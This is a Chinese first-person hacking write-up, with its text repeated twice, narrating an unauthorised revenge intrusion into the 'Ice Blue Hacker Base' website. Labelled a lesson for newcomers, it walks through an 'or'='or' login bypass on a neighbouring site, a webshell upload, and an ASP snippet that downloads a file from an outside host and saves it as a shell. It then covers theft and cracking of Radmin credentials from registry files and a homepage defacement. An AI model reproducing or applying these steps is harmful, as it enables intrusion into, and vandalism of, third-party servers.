渗透冰兰黑客基地
程序员文章站
2022-03-12 17:32:44
注:本人已经提交到C.R.S.T ,适合新人学习..
首先是有个朋友对我说有个冰兰黑客基地,转载别人的文章还不著名作者,之后还蒙骗别人说他们能入侵国外站点. 所以就想检测一下.
首... 08-10-08...
注:本人已经提交到c.r.s.t ,适合新人学习..
首先是有个朋友对我说有个冰兰黑客基地,转载别人的文章还不著名作者,之后还蒙骗别人说他们能入侵国外站点. 所以就想检测一下.
首先看了以下他的站点,主站和论坛.分别在不同的服务器.
主站是新云的,虽然爆出很多漏洞,但是毕竟人家也是玩黑的,所以不期望能从程序漏洞拿了..
论坛是php的.没仔细看,决定渗透了.
一:点兵
拿出旁注
地址:http://www.icehack.cn
ip:xx.x.xx.x(忘记了...)
挖靠,n多站点....
最后选择了一个公司的站点,有注射点,但是不显示错误,手工猜解是asc数据库 ...
拿出hdsi扫后台,扫到后台地址为http://www.xxxxx.com/product/manage/manage.asp
到这里的时候直接用'or'='or' 试了下. 进去了..
有数据库备份和恢复. 直接传jpg的木马(大马).传不上去,可能限制了大小.
之后换小马,红狼1k大的小马,传好后备份.成功. 二:士气
小马传好了,各位一定认为直接传大马 ,之后就是提权的事了吧.可惜好事多磨...
传好小马之后我直接传个大马上传,但是如图1
提示错误:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词,本次操作无效,系统已记录您的ip及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:98424b88afb8 我以为换个大马就可以了,之后换了n个,国内的,国外的都试了.我想可能是禁止提交了,但是我提交几个字都可以提交上去,到这里,我快放弃了。
但是忽然想到一哥们(烟,灭在雪里)的方法.具体如下:
提交代码
<%
set xpost = createobject("microsoft.xmlhttp")
xpost.open "get","http://www.hackerchina.cn/1.txt",false
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile server.mappath("1.asp"),2
set sget = nothing
set spost = nothing
%>
利用服务器的xml和数据流组件,从我的blog的1.txt的内容下载到目标站点根目录并保存为1.asp.
我提交这段代码,保存为3.asp ,之后访问,显示空白.
之后访问1.asp.如图
,成功了..
三 出征
已经拿到了一个webshell,就剩下提权了,但是提权一般难度要比webshell还难.如何呢?
web服务器版本 microsoft-iis/6.0
scripting.filesystemobject √ 文件操作组件
wscript.shell × 命令行执行组件
adox.catalog √ access建库组件
jro.jetengine √ access压缩组件
scripting.dictionary √ 数据流上传辅助组件
adodb.connection √ 数据库连接组件
adodb.stream √ 数据流上传组件
softartisans.fileup × sa-fileup 文件上传组件
lyfupload.uploadfile × 刘云峰文件上传组件
persits.upload.1 √ aspupload 文件上传组件
jmail.smtpmail √ jmail 邮件收发组件
cdonts.newmail × 虚拟smtp发信组件
smtpmail.smtpmail.1 × smtpmail发信组件
wscript.shell × 命令行执行组件被删除.
装了servu6.3 但是找不路径,没有权限访问.不可跨目录,
只有c:\program files c:\documents and settings可访问,装了麦咖啡,
(感谢伤心的鱼)一兄弟告诉我本地溢出,baidu了下 都是控件的,感觉麻烦..
继续找别的突破口,忽然看到有radmin 目录,哈哈,高兴,看来装了radmin.
扫描了下端口,竟然没开43958.算了,读取下注册表 读取不了.但是radmin的目录下有3个注册表文件,下载回来研究。
四 得胜
windows registry editor version 5.00
[hkey_local_machine\system\radmin]
[hkey_local_machine\system\radmin\v2.0]
[hkey_local_machine\system\radmin\v2.0\server]
[hkey_local_machine\system\radmin\v2.0\server\iplist]
[hkey_local_machine\system\radmin\v2.0\server\ntusers]
"1"=hex:24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,\
00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f1,03,00,00,24,00,00,00,00,00,00,00,\
1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,\
64,8a,f8,ec,03,00,00,24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,\
00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f4,01,00,00
[hkey_local_machine\system\radmin\v2.0\server\parameters]
"ntauthenabled"=hex:00,00,00,00
"port"=hex:fe,ff,00,00
"timeout"=hex:0a,00,00,00
"enablelogfile"=hex:01,00,00,00
"logfilepath"="c:\\logfile.txt"
"filterip"=hex:00,00,00,00
"disabletrayicon"=hex:00,00,00,00
"autoallow"=hex:00,00,00,00
"askuser"=hex:00,00,00,00
"enableeventlog"=hex:01,00,00,00
"parameter"=hex:b3,8f,17,d7,f9,4e,cb,96,11,26,42,bf,29,cd,a6,86
windows registry editor version 5.00
[hkey_current_user\software\radmin]
[hkey_current_user\software\radmin\v2.0]
[hkey_current_user\software\radmin\v2.0\parameters]
"showbw"=hex:01,00,00,00
"viewtype"=hex:00,00,00,00
"connectionmode"=hex:49,9c,00,00
"xsize"=hex:77,01,00,00
"ysize"=hex:47,01,00,00
windows registry editor version 5.00
[hkey_local_machine\software\radmin]
[hkey_local_machine\software\radmin\v1.01]
[hkey_local_machine\software\radmin\v1.01\viewtype]
"data"=hex:35,e3,db,da,7c,ef,32,ad,2c,a5,b8,1a,4b,e2,b2,47,7b,1d,eb,05,4c,36,\
0e,65,8a,ff,ec,aa,7d,63,a1,47,50,db,f2,0a,c5,a7,1d,dd,08,6b,7f,02,90,2b,b8,\
6c,da,7a,96,cb,dc,c9,e2,1a,8c,4d,25,39,57,f8,ee,83
以上是注册表文件的内容,
提权的步骤 感谢 fhod 支持.
3个注册表在本地运行之后,然后本地打开radmin设置,发现端口为65534
但是密码是32位md5,麻烦.怎么破呢..
用星号密码查看器查看为 reityewi
,连接.....................连接不上...郁闷了..
后来才知道星号密码查看器 看到的都是这个reityewi....
后来,baidu了下.找到一篇文章是直接破解radmin控制端.
地址:http://www.hackerchina.cn/index/blog/post/123.html
之后连接radmin....ok.连接上了..
五 收兵
直接找到iis.
中间还有个小插曲...
管理员登陆了3389.这里再次感谢fhod,(和管理员比速度)...
打开iis,找到冰兰的站点,之后传了大马上去.如图.
呵呵 之后修改了首页,但是并没有对数据进行删除,算是带点报复的友情检测 再次感谢 伤心的鱼 fhod 烟,灭在雪里提供技术支持.
首先看了以下他的站点,主站和论坛.分别在不同的服务器.
主站是新云的,虽然爆出很多漏洞,但是毕竟人家也是玩黑的,所以不期望能从程序漏洞拿了..
论坛是php的.没仔细看,决定渗透了.
一:点兵
拿出旁注
地址:http://www.icehack.cn
ip:xx.x.xx.x(忘记了...)
挖靠,n多站点....
最后选择了一个公司的站点,有注射点,但是不显示错误,手工猜解是asc数据库 ...
拿出hdsi扫后台,扫到后台地址为http://www.xxxxx.com/product/manage/manage.asp
到这里的时候直接用'or'='or' 试了下. 进去了..
有数据库备份和恢复. 直接传jpg的木马(大马).传不上去,可能限制了大小.
之后换小马,红狼1k大的小马,传好后备份.成功. 二:士气
小马传好了,各位一定认为直接传大马 ,之后就是提权的事了吧.可惜好事多磨...
传好小马之后我直接传个大马上传,但是如图1
提示错误:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词,本次操作无效,系统已记录您的ip及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:98424b88afb8 我以为换个大马就可以了,之后换了n个,国内的,国外的都试了.我想可能是禁止提交了,但是我提交几个字都可以提交上去,到这里,我快放弃了。
但是忽然想到一哥们(烟,灭在雪里)的方法.具体如下:
提交代码
<%
set xpost = createobject("microsoft.xmlhttp")
xpost.open "get","http://www.hackerchina.cn/1.txt",false
xpost.send()
set sget = createobject("adodb.stream")
sget.mode = 3
sget.type = 1
sget.open()
sget.write(xpost.responsebody)
sget.savetofile server.mappath("1.asp"),2
set sget = nothing
set spost = nothing
%>
利用服务器的xml和数据流组件,从我的blog的1.txt的内容下载到目标站点根目录并保存为1.asp.
我提交这段代码,保存为3.asp ,之后访问,显示空白.
之后访问1.asp.如图
,成功了..
三 出征
已经拿到了一个webshell,就剩下提权了,但是提权一般难度要比webshell还难.如何呢?
web服务器版本 microsoft-iis/6.0
scripting.filesystemobject √ 文件操作组件
wscript.shell × 命令行执行组件
adox.catalog √ access建库组件
jro.jetengine √ access压缩组件
scripting.dictionary √ 数据流上传辅助组件
adodb.connection √ 数据库连接组件
adodb.stream √ 数据流上传组件
softartisans.fileup × sa-fileup 文件上传组件
lyfupload.uploadfile × 刘云峰文件上传组件
persits.upload.1 √ aspupload 文件上传组件
jmail.smtpmail √ jmail 邮件收发组件
cdonts.newmail × 虚拟smtp发信组件
smtpmail.smtpmail.1 × smtpmail发信组件
wscript.shell × 命令行执行组件被删除.
装了servu6.3 但是找不路径,没有权限访问.不可跨目录,
只有c:\program files c:\documents and settings可访问,装了麦咖啡,
(感谢伤心的鱼)一兄弟告诉我本地溢出,baidu了下 都是控件的,感觉麻烦..
继续找别的突破口,忽然看到有radmin 目录,哈哈,高兴,看来装了radmin.
扫描了下端口,竟然没开43958.算了,读取下注册表 读取不了.但是radmin的目录下有3个注册表文件,下载回来研究。
四 得胜
windows registry editor version 5.00
[hkey_local_machine\system\radmin]
[hkey_local_machine\system\radmin\v2.0]
[hkey_local_machine\system\radmin\v2.0\server]
[hkey_local_machine\system\radmin\v2.0\server\iplist]
[hkey_local_machine\system\radmin\v2.0\server\ntusers]
"1"=hex:24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,\
00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f1,03,00,00,24,00,00,00,00,00,00,00,\
1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,\
64,8a,f8,ec,03,00,00,24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,\
00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f4,01,00,00
[hkey_local_machine\system\radmin\v2.0\server\parameters]
"ntauthenabled"=hex:00,00,00,00
"port"=hex:fe,ff,00,00
"timeout"=hex:0a,00,00,00
"enablelogfile"=hex:01,00,00,00
"logfilepath"="c:\\logfile.txt"
"filterip"=hex:00,00,00,00
"disabletrayicon"=hex:00,00,00,00
"autoallow"=hex:00,00,00,00
"askuser"=hex:00,00,00,00
"enableeventlog"=hex:01,00,00,00
"parameter"=hex:b3,8f,17,d7,f9,4e,cb,96,11,26,42,bf,29,cd,a6,86
windows registry editor version 5.00
[hkey_current_user\software\radmin]
[hkey_current_user\software\radmin\v2.0]
[hkey_current_user\software\radmin\v2.0\parameters]
"showbw"=hex:01,00,00,00
"viewtype"=hex:00,00,00,00
"connectionmode"=hex:49,9c,00,00
"xsize"=hex:77,01,00,00
"ysize"=hex:47,01,00,00
windows registry editor version 5.00
[hkey_local_machine\software\radmin]
[hkey_local_machine\software\radmin\v1.01]
[hkey_local_machine\software\radmin\v1.01\viewtype]
"data"=hex:35,e3,db,da,7c,ef,32,ad,2c,a5,b8,1a,4b,e2,b2,47,7b,1d,eb,05,4c,36,\
0e,65,8a,ff,ec,aa,7d,63,a1,47,50,db,f2,0a,c5,a7,1d,dd,08,6b,7f,02,90,2b,b8,\
6c,da,7a,96,cb,dc,c9,e2,1a,8c,4d,25,39,57,f8,ee,83
以上是注册表文件的内容,
提权的步骤 感谢 fhod 支持.
3个注册表在本地运行之后,然后本地打开radmin设置,发现端口为65534
但是密码是32位md5,麻烦.怎么破呢..
用星号密码查看器查看为 reityewi
,连接.....................连接不上...郁闷了..
后来才知道星号密码查看器 看到的都是这个reityewi....
后来,baidu了下.找到一篇文章是直接破解radmin控制端.
地址:http://www.hackerchina.cn/index/blog/post/123.html
之后连接radmin....ok.连接上了..
五 收兵
直接找到iis.
中间还有个小插曲...
管理员登陆了3389.这里再次感谢fhod,(和管理员比速度)...
打开iis,找到冰兰的站点,之后传了大马上去.如图.
呵呵 之后修改了首页,但是并没有对数据进行删除,算是带点报复的友情检测 再次感谢 伤心的鱼 fhod 烟,灭在雪里提供技术支持.